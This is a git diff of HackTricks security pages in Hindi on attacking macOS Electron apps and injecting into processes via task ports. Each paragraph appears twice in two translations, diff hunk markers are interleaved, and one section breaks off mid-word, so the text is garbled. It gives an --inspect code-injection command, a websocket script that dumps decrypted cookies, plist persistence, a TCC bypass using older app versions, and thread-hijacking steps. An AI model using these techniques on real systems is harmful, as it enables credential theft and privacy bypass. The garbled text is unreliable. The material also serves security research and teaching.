[**इस**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f) के अनुसार, यदि आप Electron एप्लिकेशन को **`--inspect`**, **`--inspect-brk`** और **`--remote-debugging-port`** जैसे फ्लैग्स के साथ निष्पादित करते हैं, तो एक **डीबग पोर्ट खुल जाएगा** जिससे आप उससे जुड़ सकते हैं (उदाहरण के लिए Chrome में `chrome://inspect` से) और आप उस पर **कोड इंजेक्ट कर सकते हैं** या यहां तक कि नए प्रोसेस भी लॉन्च कर सकते हैं।\
उदाहरण के लिए:
{% code overflow="wrap" %}
[**इस**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f) के अनुसार, यदि आप **`--inspect`**, **`--inspect-brk`** और **`--remote-debugging-port`** जैसे ध्वजों के साथ एक इलेक्ट्रॉन एप्लिकेशन को निष्पादित करते हैं, तो एक **डीबग पोर्ट खुला रहेगा** ताकि आप इससे कनेक्ट कर सकें (उदाहरण के लिए Chrome से `chrome://inspect` में से) और आप उस पर **कोड इंजेक्ट** कर सकें या नए प्रक्रियाएँ भी चला सकें।\
उदाहारण के लिए:
```bash
/Applications/Signal.app/Contents/MacOS/Signal --inspect=9229
# Connect to it using chrome://inspect and execute a calculator with:
@ -182,14 +178,14 @@ require('child_process').execSync('/System/Applications/Calculator.app/Contents/
{% endcode %}
{% hint style="danger" %}
यदि fuse**`EnableNodeCliInspectArguments`** अक्षम है, तो ऐप **node पैरामीटर्स को अनदेखा करेगा** (जैसे `--inspect`) जब तक कि env वेरिएबल **`ELECTRON_RUN_AS_NODE`** सेट नहीं होता, जिसे भी **अनदेखा किया जाएगा** यदि fuse **`RunAsNode`** अक्षम है
यदि फ्यूज **`EnableNodeCliInspectArguments`** अक्षम है, तो ऐप **नोड पैरामीटर** (जैसे `--inspect`) को नजरअंदाज करेगा जब तक इसे चालू नहीं किया जाता है, जब तक एनवी वेरिएबल **`ELECTRON_RUN_AS_NODE`** सेट नहीं होता है, जिसे फ्यूज **`RunAsNode`** अक्षम होने पर भी **नजरअंदाज** किया जाएगा
हालांकि, आप अभी भी **electron पैरामीटर `--remote-debugging-port=9229`** का उपयोग कर सकते हैं लेकिन पिछला पेलोड अन्य प्रोसेसेस को निष्पादित करने के लिए काम नहीं करेगा।
हालांकि, आप अब भी **इलेक्ट्रॉन पैरामीटर `--remote-debugging-port=9229`** का उपयोग कर सकते हैं लेकिन पिछला पेलोड अन्य प्रक्रियाओं को निष्पादित करने के लिए काम नहीं करेगा।
{% endhint %}
पैरामीटर **`--remote-debugging-port=9222`** का उपयोग करके, आप Electron App से कुछ जानकारी चुरा सकते हैं जैसे कि **history** (GET कमांड्स के साथ) या ब्राउज़र के **cookies** (क्योंकि वे ब्राउज़र के अंदर **decrypted** होते हैं और एक **json endpoint** होता है जो उन्हें देगा)।
पैरामीटर **`--remote-debugging-port=9222`** का उपयोग करके इलेक्ट्रॉन ऐप से कुछ जानकारी चुरा सकते हैं जैसे **हिस्ट्री** (GET कमांड के साथ) या ब्राउज़र के **कुकी** (जैसे कि वे ब्राउज़र के अंदर **डिक्रिप्ट** होते हैं और एक **जेसन एंडपॉइंट** है जो उन्हें देगा)।
आप यह कैसे कर सकते हैं इसके बारे में [**यहाँ**](https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e) और [**यहाँ**](https://slyd0g.medium.com/debugging-cookie-dumping-failures-with-chromiums-remote-debugger-8a4c4d19429f) सीख सकते हैं और स्वचालित उपकरण [WhiteChocolateMacademiaNut](https://github.com/slyd0g/WhiteChocolateMacademiaNut) या एक साधारण स्क्रिप्ट का उपयोग कर सकत है जैसे:
आप यह कैसे कर सकते हैं [**यहाँ**](https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e) और [**यहाँ**](https://slyd0g.medium.com/debugging-cookie-dumping-failures-with-chromiums-remote-debugger-8a4c4d19429f) और स्वचालित उपकरण [WhiteChocolateMacademiaNut](https://github.com/slyd0g/WhiteChocolateMacademiaNut) या एक सरल स्क्रिप्ट का उपयोग करें:
```python
import websocket
ws = websocket.WebSocket()
@ -197,11 +193,11 @@ ws.connect("ws://localhost:9222/devtools/page/85976D59050BFEFDBA48204E3D865D00",
ws.send('{\"id\": 1, \"method\": \"Network.getAllCookies\"}')
print(ws.recv()
```
इस [**ब्लॉगपोस्ट**](https://hackerone.com/reports/1274695) में, इस डिबगिंग का दुरुपयोग करके एक हेडलेस क्रोम को **मनमानी फाइलों को मनमाने स्थानों पर डाउनलोड करने** के लिए किया जाता है
[**इस ब्लॉगपोस्ट**](https://hackerone.com/reports/1274695) में, इस डीबगिंग का दुरुपयोग किया गया है ताकि एक हेडलेस क्रोम **किसी भी स्थान पर विविध फ़ाइलें डाउनलोड कर सके**
### App Plist से इंजेक्शन
### एप्लिकेशन प्लिस्ट से इंजेक्शन
आप इस env वेरिएबल का दुरुपयोग प्लिस्ट में इन कीज़ को जोड़कर पर्सिस्टेंस बनाए रखने के लिए कर सकते हैं:
आप इस env वेरिएबल का दुरुपयोग प्लिस्ट में कर सकते हैं ताकि स्थिरता बनाए रखने के लिए इन कुंजियों को जोड़ सकें:
```xml
<dict>
<key>ProgramArguments</key>
@ -215,22 +211,22 @@ print(ws.recv()
<true/>
</dict>
```
## पुराने संस्करणों का दुरुपयोग करके TCC बायपास
## TCC बायपास पुराने संस्करणों का दुरुपयोग
{% hint style="success" %}
macOS का TCC डेमन एप्लिकेशन के निष्पादित संस्करण की जांच नहीं करता है। इसलिए यदि आप **Electron एप्लिकेशन में कोड इंजेक्ट नहीं कर सकते** पिछली तकनीकों के साथ, आप एप्लिकेशन का पिछला संस्करण डाउनलोड कर सकते हैं और उसमें कोड इंजेक्ट कर सकते हैं क्योंकि उसे अभी भी TCC विशेषाधिकार मिलेंगे (जब तक कि Trust Cache इसे रोकता नहीं है)।
macOS का TCC डेमन एप्लिकेशन के निष्पादित संस्करण की जांच नहीं करता। इसलिए, अगर आप **किसी भी पिछली तकनीक के साथ इलेक्ट्रॉन एप्लिकेशन में कोड इंजेक्ट नहीं कर सकते** तो आप पिछले संस्करण का ऐप डाउनलोड करके उसमें कोड इंजेक्ट कर सकते हैं क्योंकि यह अभी भी TCC अधिकार प्राप्त करेगा (यदि ट्रस्ट कैश इसे रोकता नहीं है)।
{% endhint %}
## गैर JS कोड चलाना
## गैर JS कोड चलाएं
पिछली तकनीकें आपको **Electron एप्लिकेशन की प्रक्रिया के अंदर JS कोड चलाने की अनुमति देंगी**। हालांकि, याद रखें कि **चाइल्ड प्रोसेस माता-पिता एप्लिकेशन के समान सैंडबॉक्स प्रोफाइल के अंतर्गत चलते हैं** और **उनके TCC अनुमतियों को विरासत में प्राप्त करते हैं**।\
इसलिए, यदि आप उदाहरण के लिए कैमरा या माइक्रोफोन तक पहुंचने के लिए अधिकारों का दुरुपयोग करना चाहते हैं, आप सिर्फ **प्रक्रिया से एक अन्य बाइनरी चला सकते हैं**।
पिछली तकनीक आपको **इलेक्ट्रॉन एप्लिकेशन की प्रक्रिया में JS कोड चलाने** की अनुमति देगी। हालांकि, ध्यान रखें कि **बच्ची प्रक्रियाएँ माता एप्लिकेशन के समान सैंडबॉक्स प्रोफ़ाइल के तहत चलती हैं** और **उनकी TCC अनुमतियों को वे विरासत में लेती हैं**।\
इसलिए, यदि आप कैमरा या माइक्रोफोन तक पहुंचने के लिए अधिकारों का दुरुपयोग करना चाहते हैं, तो आप बस **प्रक्रिया से एक और बाइनरी चला सकते हैं**।
## स्वचालित इंजेक्शन
उपकरण [**electroniz3r**](https://github.com/r3ggi/electroniz3r) का उपयोग करके आसानी से **कमजोर Electron एप्लिकेशनों को खोजने** और उनमें कोड इंजेक्ट करने के लिए किया जा सकता है। यह उपकरण **`--inspect`** तकनीक का उपयोग करने का प्रयास करेगा:
उपकरण [**electroniz3r**](https://github.com/r3ggi/electroniz3r) को आसानी से **संकटशील इलेक्ट्रॉन एप्लिकेशनें** खोजने और उन पर कोड इंजेक्ट करने के लिए उपयोग किया जा सकता है। यह उपकरण **`--inspect`** तकनीक का उपयोग करने का प्रयास करेगा:
आपको इसे स्वयं कंपाइल करना होगा और इसे इस तरह उपयोग कर सकते हैं:
आपको इसे खुद कंपाइल करना होगा और इसे इस प्रकार से उपयोग कर सकते हैं:
```bash
# Find electron apps
./electroniz3r list-apps
@ -274,14 +270,14 @@ Shell binding requested. Check `nc 127.0.0.1 12345`
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें</strong></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
दूसरे तरीके HackTricks का समर्थन करने के लिए:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) देखें!
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** ट्विटर पर **फॉलो** करें 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपने हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos को PRs सबमिट करके
</details>

View file

@ -1,16 +1,16 @@
# macOS थ्रेड इंजेक्शन वाया टास्क पोर्ट
# macOS Thread Injection via Task port
<details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो बनाने के लिए</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
दूसरे तरीके HackTricks का समर्थन करने के लिए:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहत हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**.
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें.
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **मुझे** **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details>
@ -22,47 +22,47 @@ HackTricks का समर्थन करने के अन्य तरी
## 1. थ्रेड हाइजैकिंग
्रारंभ में, रिमोट टास्क से थ्रेड सूची प्राप्त करने के लिए **`task_threads()`** फंक्शन को टास्क पोर्ट पर आह्वान किया जाता है। एक थ्रेड को हाइजैकिंग के लिए चुना जाता है। यह दृष्टिकोण पारंपरिक कोड इंजेक्शन विधियों से भिन्न होता है क्योंकि नए मिटिगेशन द्वारा `thread_create_running()` को ब्लॉक करने के कारण नए रिमोट थ्रेड का निर्माण प्रतिबंधित है।
हले, दूरस्थ कार्य से थ्रेड सूची प्राप्त करने के लिए टास्क पोर्ट पर **`task_threads()`** फ़ंक्शन को आमंत्रित किया जाता है। हाइजैकिंग के लिए एक थ्रेड चुना जाता है। यह दृष्टिकोण पारंपरिक कोड इंजेक्शन विधियों से भिन्न है क्योंकि नए दूरस्थ थ्रेड बनाना नए मिटिगेशन द्वारा निषिद्ध है जिसके कारण `thread_create_running()` को ब्लॉक कर दिया गया है।
थ्रेड को नियंत्रित करने के लिए, **`thread_suspend()`** को कॉल किया जाता है, जिससे इसकी क्रियान्विति रुक जाती है।
थ्रेड को नियंत्रित करने के लिए, **`thread_suspend()`** को कॉल किया जाता है, जिससे इसका निष्पादन रोक दिया जाता है।
रिमोट थ्रेड पर अनुमति दी गई केवल क्रियाएँ **रोकना** और **शुरू करना**, **प्राप्त करना** और **संशोधित करना** इसके रजिस्टर मूल्यों की हैं। रिमोट फंक्शन कॉल्स को रजिस्टर `x0` से `x7` तक **तर्कों** के लिए सेट करके, **`pc`** को वांछित फंक्शन के लिए टारगेट करके, और थ्रेड को सक्रिय करके शुरू किया जाता है। यह सुनिश्चित करना कि थ्रेड रिटर्न के बाद क्रैश न हो, रिटर्न का पता लगाना आवश्यक है।
दूरस्थ थ्रेड पर केवल **रोकना** और **शुरू** करने, **रजिस्टर मानों को प्राप्त** और **संशोधित** करने की अनुमति है। दूरस्थ कार्यों को आरंभ करने के लिए रजिस्टर `x0` से `x7` को **आर्ग्यूमेंट्स** पर सेट करके, **`pc`** को लक्षित फ़ंक्शन पर सेट करके, और थ्रेड को सक्रिय करके दूरस्थ फ़ंक्शन कॉल किए जाते हैं। वापसी के बाद थ्रेड क्रैश न होने की सुनिश्चित करने के लिए वापसी को पहचानना आवश्यक है।
एक रणनीति में रिमोट थ्रेड के लिए `thread_set_exception_ports()` का उपयोग करके **एक अपवाद हैंडलर पंजीकृत करना** शामिल है, फंक्शन कॉल से पहले `lr` रजिस्टर को एक अमान्य पते पर सेट करना। इससे फंक्शन निष्पादन के बाद एक अपवाद ट्रिगर होता है, जो अपवाद पोर्ट को एक संदेश भेजता है, जिससे थ्रेड की स्थिति का निरीक्षण करके रिटर्न मूल्य की वसूली संभव होती है। वैकल्पिक रूप से, Ian Beer के triple\_fetch एक्सप्लॉइट से लिया गया, `lr` को अनंत रूप से लूप करने के लिए सेट किया जाता है। फिर थ्रेड के रजिस्टरों की निरंतर निगरानी की जाती है जब तक कि **`pc` उस निर्देश की ओर इशारा नहीं करता**
एक रणनीति में **दूरस्थ थ्रेड के लिए एक अपवाद हैंडलर रजिस्टर** करना `thread_set_exception_ports()` जिससे फ़ंक्शन कॉल से पहले `lr` रजिस्टर को एक अवैध पते पर सेट किया जाता है। इससे फ़ंक्शन निष्पादन के बाद एक अपवाद उत्पन्न होता है, जो अपवाद पोर्ट को संदेश भेजता है, थ्रेड की स्थिति की जांच को सक्षम करता है ताकि वापसी मूल्य को पुनः प्राप्त किया जा सके। वैकल्पिक रूप से, इयान बीयर के ट्रिपल_फेच धोखाधड़ी से अपनाया गया है, `lr` को अनंतता से लूप करने के लिए सेट किया जाता है। फिर थ्रेड के रजिस्टरों को निरंतर मॉनिटर किया जाता है जब तक **`pc` उस निर्देश को नहीं दिखाता** है
## 2. संचार के लिए Mach पोर्ट्स
## 2. संचार के लिए मैक पोर्ट्स
अगला चरण रिमोट थ्रेड के साथ संचार की सुविधा के लिए Mach पोर्ट्स स्थापित करना शामिल है। ये पोर्ट्स कार्यों के बीच मनमाने सेंड और रिसीव अधिकारों को स्थानांतरित करने में महत्वपूर्ण हैं।
अगले चरण में, दूरस्थ थ्रेड के साथ संचार सुविधा स्थापित करने के लिए मैक पोर्ट्स स्थापित करना शामिल है। ये पोर्ट्स कार्यों के बीच विभिन्न भेजने और प्राप्त करने के लिए महत्वपूर्ण हैं।
द्विदिश संचार के लिए, दो Mach रिसीव अधिकार बनाए जाते हैं: एक स्थानीय और दूा रिमोट टास्क में। इसके बाद, प्रत्येक पोर्ट के लिए एक सेंड अधिकार को समकक्ष कार्य में स्थानांतरित किया जाता है, जिससे संदेश विनिमय संभव होता है
द्विदिशीय संचार के लिए, दो मैक प्राप्ति अधिकार बनाए जाते हैं: एक स्थानीय और दूरस्ार्य में। इसके बाद, प्रत्येक पोर्ट के लिए एक भेजने का अधिकार विपरीत कार्य में स्थानांतरित किया जाता है, संदेश विनिमय को सक्षम करते हैं
स्थानीय पोर्ट पर ध्यान केंद्रित करते हुए, रिसीव अधिकार स्थानीय कार्य द्वारा रखा जाता है। पोर्ट को `mach_port_allocate()` के साथ बनाया जाता है। चुनौती इस पोर्ट के एक सेंड अधिकार को रिमोट टास्क में स्थानांतरित करने में निहित है
स्थानीय पोर्ट पर ध्यान केंद्रित है, स्थानीय कार्य द्वारा प्राप्ति अधिकार को धारण किया जाता है। पोर्ट `mach_port_allocate()` के साथ बनाया जाता है। चुनौती इसमें है कि इस पोर्ट में एक भेजने का अधिकार दूरस्थ कार्य में स्थानांतरित करना
एक रणनीति में `thread_set_special_port()` का उपयोग करके स्थानीय पोर्ट के लिए एक सेंड अधिकार को रिमोट थ्रेड के `THREAD_KERNEL_PORT` में रखना शामिल है। फिर, रिमोट थ्रेड को `mach_thread_self()` को कॉल करने के लिए निर्देशित किया जाता है ताकि सेंड अधिकार प्राप्त किया जा सके।
एक रणनीति शामिल है `thread_set_special_port()` का उपयोग करना जिससे स्थानीय पोर्ट के लिए एक भेजने का अधिकार दूरस्थ थ्रेड के `THREAD_KERNEL_PORT` में रखा जाता है। फिर, दूरस्थ थ्रेड को निर्देशित किया जाता है कि `mach_thread_self()` कॉल करें ताकि वह भेजने का अधिकार प्राप्त कर सके।
रिमोट पोर्ट के लिए, प्रक्रिया मूल रूप से उलटी होती है। रिमोट थ्रेड को `mach_reply_port()` के माध्यम से Mach पोर्ट उत्पन्न करने के लिए निर्देशित किया जाता है (क्योंकि `mach_port_allocate()` इसके रिटर्न मैकेनिज्म के कारण अनुपयुक्त है)। पोर्ट निर्माण के बाद, रिमोट थ्रेड में `mach_port_insert_right()` को आह्वान किया जाता है ताकि एक सेंड अधिकार स्थापित किया जा सके। इस अधिकार को फिर कर्नेल में `thread_set_special_port()` का उपयोग करके स्टैश किया जाता है। स्थानीय कार्य में वापस, `thread_get_special_port()` का उपयोग रिमोट थ्रेड पर किया जाता है ताकि रिमोट टास्क में नव आवंटित Mach पोर्ट के लिए एक सेंड अधिकार प्राप्त किया जा सके।
दूरस्थ पोर्ट के लिए, प्रक्रिया मूल रूप से उलट दी जाती है। दूरस्थ थ्रेड को निर्देशित किया जाता है कि `mach_reply_port()` के माध्यम से एक मैक पोर्ट उत्पन्न करें (क्योंकि `mach_port_allocate()` अपने वापसी तंत्र के कारण अनुचित है)। पोर्ट निर्माण के बाद, दूरस्थ थ्रेड में `mach_port_insert_right()` को आमंत्रित किया जाता है ताकि एक भेजने का अधिकार स्थापित हो सके। यह अधिकार फिर कर्णल में `thread_set_special_port()` का उपयोग करके छिपाया जाता है। स्थानीय कार्य में, दूरस्थ थ्रेड पर `thread_get_special_port()` का उपयोग किया जाता है ताकि दूरस्थ कार्य में नवीन निर्धारित मैक पोर्ट के लिए भेजने का अधिकार प्राप्त किया जा सके।
इन चरणों के पूरा होने के बाद Mach पोर्ट्स की स्थापना हो जाती है, जिससे द्विदिश संचार के लिए आधार तैयार हो जाता है।
इन कदमों के पूरा होने से मैक पोर्ट्स की स्थापना होती है, जो द्विदिशीय संचार के लिए आधार रखती है।
## 3. बेसिक मेमोरी रीड/राइट प्रिमिटिव्स
## 3. मूल मेमोरी पठन/लेखन आधार
इस खंड में, ध्यान बेसिक मेमोरी रीड और राइट प्रिमिटिव्स स्थापित करने के लिए एक्जीक्यूट प्रिमिटिव का उपयोग करने पर है। ये प्रारंभिक चरण रिमोट प्रोसेस पर अधिक नियंत्रण प्राप्त करने के लिए महत्वपूर्ण हैं, हालांकि इस स्तर पर प्रिमिटिव्स कई उद्देश्यों की सेवा नहीं करेंगे। जल्द ही, उन्हें अधिक उन्नत संस्करणों में अपग्रेड किया जाएगा
इस खंड में, कार्य को बुनियादी मेमोरी पठन और लेखन आधार स्थापित करने के लिए क्षेत्रिय प्रयोग करने पर ध्यान केंद्रित है। ये प्रारंभिक कदम दूरस्थ प्रक्रिया पर अधिक नियंत्रण प्राप्त करने के लिए महत्वपूर्ण हैं, हालांकि इस स्तर पर प्राथमिक आधार बहुत सारे उद्देश्यों की सेवा नहीं करेंगे। जल्द ही, वे अधिक उन्नत संस्करणों में अपग्रेड किए जाएंगे
### एक्जीक्यूट प्रिमिटिव का उपयोग करके मेमोरी रीडिंग और राइटिंग
### एक्जीक्यूट प्रिमिटिव का उपयोग करके मेमोरी पठन और लेखन
लक्ष्य विशिष्ट फंक्शनों का उपयोग करके मेमोरी रीडिंग और राइटिंग करना है। मेमोरी पढ़ने के लिए, निम्नलिखित संरचना वाले फंक्शनों का उपयोग किया जाता है:
लक्ष्य है कि विशेष कार्यों का उपयोग करके मेमोरी पठन और लेखन किया जाए। मेमोरी पठन के लिए, निम्नलिखित संरचना की तुलना करने वाले फंक्शन का उपयोग किया जाता है:
```c
uint64_t read_func(uint64_t *address) {
return *address;
}
```
और मेमोरी में लिखने के लिए, इस संरचना के समान कार्यों का उपयोग किया जाता है:
और मेमोरी में लेखन के लिए, इस संरचना के समान कार्यों का उपयोग किया जाता है:
```c
void write_func(uint64_t *address, uint64_t value) {
*address = value;
}
```
ये फंक्शन्स दिए गए असेंबली निर्देशों के अनुरूप हैं:
ये फ़ंक्शन दिए गए असेम्बली इंस्ट्रक्शंस के समान हैं:
```
_read_func:
ldr x0, [x0]
@ -73,105 +73,71 @@ ret
```
### उपयुक्त फ़ंक्शन्स की पहचान
सामान्य लाइब्रेरीज़ की स्कैनिंग से इन कार्यों के लिए उपयुक्त उम्मीदवार मिले:
सामान्य पुस्तकालयों की जांच ने इन ऑपरेशन्स के लिए उपयुक्त उम्मीदवारों की पहचान की:
1. **मेमोरी पढ़ना:**
[Objective-C रनटाइम लाइब्रेरी](https://opensource.apple.com/source/objc4/objc4-723/runtime/objc-runtime-new.mm.auto.html) से `property_getName()` फ़ंक्शन को मेमोरी पढ़ने के लिए उपयुक्त फ़ंक्शन के रूप में पहचाना गया है। नीचे फ़ंक्शन का विवरण दिया गया है:
[Objective-C runtime library](https://opensource.apple.com/source/objc4/objc4-723/runtime/objc-runtime-new.mm.auto.html) से `property_getName()` फ़ंक्शन को मेमोरी पढ़ने के लिए एक उपयुक्त फ़ंक्शन के रूप में पहचाना गया है। नीचे फ़ंक्शन का विवरण दिया गया है:
```c
const char *property_getName(objc_property_t prop) {
return prop->name;
}
```
यह फ़ंक्शन प्रभावी रूप से `read_func` की तरह काम करता है, `objc_property_t` के पहले फ़ील्ड को वापस करके।
यह फ़ंक्शन पहले क्षेत्र को वापस करके `objc_property_t` का पहला फ़ील्ड वापस करने की तरह प्रभावी रूप से काम करता है।
2. **मेमोरी लिखना:**
मेमोरी लिखने के लिए पहले से बने फ़ंक्शन को ढूँढना अधिक चुनौतीपूर्ण है। हालांकि, libxpc से `_xpc_int64_set_value()` फ़ंक्शन निम्नलिखित डिसैसेम्बली के साथ एक उपयुक्त उम्मीदवार है:
```
मेमोरी लिखने के लिए एक पूर्व-निर्मित फ़ंक्शन खोजना अधिक चुनौतीपूर्ण है। हालांकि, `libxpc` से `_xpc_int64_set_value()` फ़ंक्शन एक उपयुक्त उम्मीदवार है जिसका निम्नलिखित disassembly है:
```c
__xpc_int64_set_value:
str x1, [x0, #0x18]
ret
```
64-बिट लिखने के लिए एक विशिष्ट पते पर, दूरस्थ कॉल को इस प्रकार संरचित किया गया है:
एक विशिष्ट पते पर 64-बिट लेख करने के लिए, रिमोट कॉल को इस प्रकार संरचित किया जाता है:
```c
_xpc_int64_set_value(address - 0x18, value)
```
## 4. साझा मेमोरी सेटअप
## 4. साझा स्मृति सेटअप
उद्देश्य स्थानीय और दूरस्थ कार्यों के बीच साझा मेमोरी स्थापित करना है, जो डेटा स्थानांतरण को सरल बनाता है और बहु-तर्क वाले फ़ंक्शनों को कॉल करने में सहायता करता है। इस दृष्टिकोण में `libxpc` का उपयोग करना और इसके `OS_xpc_shmem` ऑब्जेक्ट प्रकार का लाभ उठाना शामिल है, जो Mach मेमोरी प्रविष्टियों पर आधारित है।
उद्देश्य स्थानीय और दूरस्थ कार्यों के बीच साझा स्मृति स्थापित करना है, डेटा स्थानांतरण को सरल बनाना और एकाधिक तर्कों के साथ फ़ंक्शन को बुलाना सुविधाजनक बनाना। इस दृष्टिकोण में `libxpc` और इसके `OS_xpc_shmem` ऑब्जेक्ट प्रकार का सहारा लेना शामिल है, जो मैक मेमोरी एंट्रीज़ पर निर्मित है।
### प्रक्रिया अवलोकन:
1. **मेमोरी आवंटन**:
- `mach_vm_allocate()` का उपयोग करके साझा करने के लिए मेमोरी आवंटित करें।
- आवंटित मेमोरी क्षेत्र के लिए `xpc_shmem_create()` का उपयोग करके एक `OS_xpc_shmem` ऑब्जेक्ट बनाएं। यह फ़ंक्शन Mach मेमोरी प्रविष्टि के निर्माण को प्रबंधित करेगा और `OS_xpc_shmem` ऑब्जेक्ट के ऑफसेट `0x18` पर Mach send right स्टोर करेगा।
2. **दूरस्थ प्रक्रिया में साझा मेमोरी बनाना**:
- `malloc()` के दूरस्थ कॉल के साथ दूरस्थ प्रक्रिया में `OS_xpc_shmem` ऑब्जेक्ट के लिए मेमोरी आवंटित करें।
- स्थानीय `OS_xpc_shmem` ऑब्जेक्ट की सामग्री को दूरस्थ प्रक्रिया में कॉपी करें। हालांकि, यह प्रारंभिक कॉपी ऑफसेट `0x18` पर गलत Mach मेमोरी प्रविष्टि नामों के साथ होगी।
3. **Mach मेमोरी प्रविष्टि को सही करना**:
- दूरस्थ कार्य में Mach मेमोरी प्रविष्टि के लिए send right डालने के लिए `thread_set_special_port()` विधि का उपयोग करें।
- ऑफसेट `0x18` पर Mach मेमोरी प्रविष्टि क्षेत्र को दूरस्थ मेमोरी प्रविष्टि के नाम से ओवरराइट करके सही करें।
4. **साझा मेमोरी सेटअप को अंतिम रूप देना**:
- दूरस्थ `OS_xpc_shmem` ऑब्जेक्ट को मान्य करें।
- `xpc_shmem_remote()` के दूरस्थ कॉल के साथ साझा मेमोरी मैपिंग स्थापित करें।
इन चरणों का पालन करके, स्थानीय और दूरस्थ कार्यों के बीच साझा मेमोरी को कुशलतापूर्वक सेटअप किया जाएगा, जिससे डेटा स्थानांतरण और बहु-तर्क वाले फ़ंक्शनों का निष्पादन सीधा हो जाएगा।
## अतिरिक्त कोड स्निपेट
मेमोरी आवंटन और साझा मेमोरी ऑब्जेक्ट निर्माण के लिए:
1. **स्मृति आवंटन**:
- `mach_vm_allocate()` का उपयोग करके साझा करने के लिए स्मृति आवंटित करें।
- आवंटित स्मृति क्षेत्र के लिए एक `OS_xpc_shmem` ऑब्ज
```c
mach_vm_allocate();
xpc_shmem_create();
```
प्रोसेस में साझा मेमोरी ऑब्जेक्ट बनाने और सही करने के लिए:
दूरस्थ प्रक्रिया में साझा स्मृति वस्तु बनाने और सुधारित करने के लिए:
```c
malloc(); // for allocating memory remotely
thread_set_special_port(); // for inserting send right
```
## 5. पूर्ण नियंत्रण प्राप्त करना
साझा मेमोरी स्थापित करने और मनमानी निष्पादन क्षमताओं को प्राप्त करने के बाद, हमने मूल रूप से लक्षित प्रक्रिया पर पूर्ण नियंत्रण प्राप्त कर लिया है। इस नियंत्रण को सक्षम करने वाली मुख्य कार्यक्षमताएं हैं:
साझा मेमोरी स्थापित करने और विचारशील क्रियान्वयन क्षमताओं को प्राप्त करने पर सफलतापूर्वक, हमने मुख्य रूप से लक्ष्य प्रक्रिया पर पूर्ण नियंत्रण प्राप्त कर लिया है। इस नियंत्रण को संभालने वाले महत्वपूर्ण कार्यक्षमताएँ हैं:
